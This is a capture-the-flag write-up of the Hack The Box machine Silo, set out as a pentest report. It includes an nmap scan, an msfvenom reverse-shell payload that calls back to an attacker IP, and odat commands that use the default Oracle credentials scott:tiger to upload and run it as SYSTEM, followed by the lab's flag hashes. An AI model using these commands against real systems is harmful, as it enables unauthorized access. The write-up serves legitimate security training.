HTB Silo
Summary
HTB Silo is an easy ranked retired box that has an exposed Oracle database on port 1521 which is configured with default credentials. This allows for direct access to the database software, which enables us to acheive arbitrary file uploads and code execution.
Service Enumeration
port | protocol | version | notes |
---|---|---|---|
135/tcp | msrpc | Microsoft Windows RPC | |
139/tcp | netbios-ssn | Microsoft Windows netbios-ssn | |
445/tcp | microsoft-ds | Microsoft Windows Server 2008 R2 - 2012 microsoft-ds | |
1521/tcp | oracle-tns | Oracle TNS listener 11.2.0.2.0 | Vulnerable; default credentials |
Nmap Scan results
Nmap scan report for 10.129.108.213
Host is up, received user-set (0.071s latency).
Scanned at 2023-09-20 01:33:37 UTC for 129s
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns syn-ack ttl 127 Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open oracle-tns syn-ack ttl 127 Oracle TNS listener (requires service name)
49160/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49161/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 63928/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41696/tcp): CLEAN (Couldn't connect)
| Check 3 (port 24956/udp): CLEAN (Timeout)
| Check 4 (port 49229/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-09-20T01:35:43
|_ start_date: 2023-09-20T01:30:38
From our initial scan we are able to see that there is an "Oracle TNS" sever on TCP 1521. Upon discovering this, metasploit module auxiliary/admin/oracle/sid_brute
was utilized in order to attempt to discover any valid SIDs on the server. A valid SID, XE
was discovered.
After discovering this SID, an MSF Venom payload was created as follows:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f exe > reverse.exe
A handler was built in the MSFConsole and the payload was uploaded using odat with the SID from above and default credentials for Oracle DB which can be found here:
odat utlfile -s 10.129.108.213 -U scott -P tiger --sysdba -d XE --putFile /temp reverse.exe /home/kali/Documents/htb/silo/reverse.exe
[1] (10.129.108.213:1521): Put the /home/kali/Documents/htb/silo/reverse.exe local file in the /temp folder like reverse.exe on the 10.129.108.213 server
[+] The /home/kali/Documents/htb/silo/reverse.exe file was created on the /temp directory on the 10.129.108.213 server like the reverse.exe file
The default credential pair scott:tiger
was confirmed to work, and the payload was successfully uploaded to the remote host.
After successfully uploading the payload, it was then executed using odat as follows:
odat externaltable -s 10.129.108.213 --sysdba -d XE -U scott -P tiger --exec /temp reverse.exe
This resulted in a successful execution of the payload and a reverse shell being spawned with NT AUTHORITY\SYSTEM as the user.
Vulnerability Explanation
By leaving the application configured with default credentials, an attacker can trivially gain unauthorized access to an application simply by consulting vendor documentation. With many database systems, functions exist which allow for arbitrary read, write and execution on the system, which can result in a complete compromise.
Vulnerability Fix
Please consider changing credentials from their default values before moving a system into production. Ensure that your password policy requires regular rotation, and passwords of 12+ characters length, using all alphanumeric characters and symbols.
Severity
Assessed CVSS 3.0: 9.5 Critical
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C
Proof Of Concept Code
No exploits used; this issue was caused through misconfiguration.
Proof Screenshot
User
Admin
Proof Text
User
f541cb8ce4a5856a57393bee39efd419
Admin
6db42932c1287dd5e8a53c4635eb729d